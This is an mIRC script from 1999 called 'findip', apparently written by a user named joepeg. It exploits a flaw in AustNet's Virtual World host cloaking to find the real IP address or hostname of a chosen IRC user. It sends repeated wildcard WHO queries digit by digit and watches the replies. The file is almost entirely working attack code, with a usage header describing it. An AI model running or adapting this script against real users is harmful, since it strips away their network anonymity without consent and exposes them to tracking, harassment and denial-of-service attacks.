;findip v2.0 by joepeg (jo3) [Skank4ska@Rocketmail.com]
;040799
;
;findip determines the real host or IP of a given nick if either is cloaked behind
;an AustNet Virtual World account. 
;
;Syntax: /findip [-h host_pattern] <nickname>
;
;            -h              - switch to let the script know you are scanning for a host rather than IP
;                                      If switch is not used, findip will, by default, attempt to determine the IP
;            host_pattern    - basic host pattern of nickname's real host. 
;                                      All number positions must be replaced with #'s
;
;                                      example host: max-10-123.goulburn.net.au
;                                      host pattern: max-##-###.goulburn.net.au
;
;                                      To learn more on determining host pattern: http://www.2600.org.au/austnet-hack.html
;            nickname        - IRC nickname of user who's host/IP you are trying to determine
;
;NOTE: this script has very little error checking, but should be easy to understand with the Status window replies.
;
;You are welcome to distribute this source freely with appropriate credit to the author. (joepeg@EFnet - Skank4ska@Rocketmail.com)
;If you wish to alter it, please acknowledge the origional author in its distribution, and email the new source to his address.
;
;For clarity, this script was derived completely from the information found at http://www.2600.org.au/austnet-hack.html.
;I have no AustNet experience, nor do I have any further knowledge (about AustNet, this exploit, or any of its components) than 
;what is found at the above URL.
;
;Please send any comments or gripes to Skank4ska@Rocketmail.com
;Enjoy - .joepeg

alias findip {
  if ($1 == $null) {
    findiphelp
    halt
  }
  if ($1 == -h) {
    if ($3 == $null) {
      findiphelp
      halt
    }
    echo -a [findip]: Scanning for host...
    unset %findip.*
    set %findip.status on
    set %findip.host $2
    set %findip.nick $3
    set %findip.realcount $count(%findip.host,$chr(35))
    set %findip.tempcount 1
    set %findip.replycount 0
    set %findip.findhost true
    set %findip.pos $pos(%findip.host,$chr(35),1)
    findip3
  }
  else {
    echo -a [findip]: Scanning for IP...
    unset %findip.*
    set %findip.status on
    set %findip.nick $1
    set %findip.replycount 0
    dns %findip.nick
  }
}

alias findip2 {
  set %findip.num 0
  :again
  who %findip.ip $+ %findip.num $+ $chr(42)
  inc %findip.num
  if (%findip.num > 9) { 
    halt 
  }
  goto again
}

alias findip3 {
  set %findip.num 0
  :again
  if (%findip.pos > 1) { set %findip.hosttemp $mid(%findip.host,1,$calc(%findip.pos - 1)) $+ %findip.num $+ $mid(%findip.host,$calc(%findip.pos + 1), $len(%findip.host)) }
  else { set %findip.hosttemp %findip.num $+ $mid(%findip.host,$calc(%findip.pos + 1), $len(%findip.host)) }
  who $replace(%findip.hosttemp,$chr(35),$chr(42))
  inc %findip.num
  if (%findip.num > 9) { 
    halt
  }
  goto again  
}

alias findiphelp {
  echo -a $chr(160)
  echo -a Findip by jo3
  echo -a -------------
  echo -a Findip determines the real IP or hostname of the given nick
  echo -a when cloaked by an AustNet's Virtual World account
  echo -a usage:
  echo -a /findip [-h hostname] <nickname>
  echo -a $chr(160)
}
on 1:DNS: {
  if (%findip.status == on) {
    if ($iaddress == $null) {
      echo -a [findip]: Unable to resolve cloaked IP. Stopping.
      unset %findip.*
      halt
    }
    set %findip.ip  $gettok($iaddress,1-2,46) $+ $chr(46)
    findip2
  }
}
raw 352:*: {
  if (%findip.status == on) {
    if ($6 == %findip.nick) { 
      set %findip.grabip on 
      set %findip.ipgrabbed true
      set %findip.replycount $calc(%findip.replycount - 10)
    }
  }
}


raw 315:*: {
  if (%findip.status == on) {
    inc %findip.replycount
    if (%findip.grabip == on) {
      if (%findip.findhost == true) {
        set %findip.host $mid($2,1,$calc(%findip.pos)) $+ $mid(%findip.host,$calc(%findip.pos + 1), $len(%findip.host))
        set %findip.grabip off
        inc %findip.tempcount
        if (%findip.tempcount > %findip.realcount) {
          echo -a [findip]: Real Host Found! %findip.nick $+ @ $+ %findip.host
          unset %findip.*
          halt
        }
        set %findip.pos $pos(%findip.host,$chr(35),1)
        findip3
      }
      else {
        set %findip.ip $left($2, $calc($len($2) - 1))
        set %findip.grabip off
        if ($count(%findip.ip,$chr(46)) == 2) {
          if ($gettok(%findip.ip,3,46) > 0 && $gettok(%findip.ip,3,46) < 26) { findip2 }
          else {
            set %findip.ip %findip.ip $+ $chr(46)
            findip2
          }
        }
        if ($count(%findip.ip,$chr(46)) == 3) {
          if ($gettok(%findip.ip,4,46) > 0 && $gettok(%findip.ip,4,46) < 26) { findip2 }
          else {
            echo -a [findip]: Real IP Found! %findip.nick $+ @ $+ %findip.ip
            unset %findip.*
            halt
          }
        }
      }
    }
    else {
      if (%findip.replycount > 9) {
        if (%findip.findhost == true) {
          if (%findip.ipgrabbed != true) {
            echo -a [findip]: Unable to determine real host. Stopping.
            echo -a [findip]: You may wish to try an alternative host pattern if exists.
            unset %findip.*
            halt
          }
          else { unset %findip.ipgrabbed }
        }
        else {
          echo -a [findip]: Unable to determine real IP. Stopping.
          echo -a [findip]: You may have to scan for host.
          unset %findip.*
          halt      
        }
      }
    }
  }
}